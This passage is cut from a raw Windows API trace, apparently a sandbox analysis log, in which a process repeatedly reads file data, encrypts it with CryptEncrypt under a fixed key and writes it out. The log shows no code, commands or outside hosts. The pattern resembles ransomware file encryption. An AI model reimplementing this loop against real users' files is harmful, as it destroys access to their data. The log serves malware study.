lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.087] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.088] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.090] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.091] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.092] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.093] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.093] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.093] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.093] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.094] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.094] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.094] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 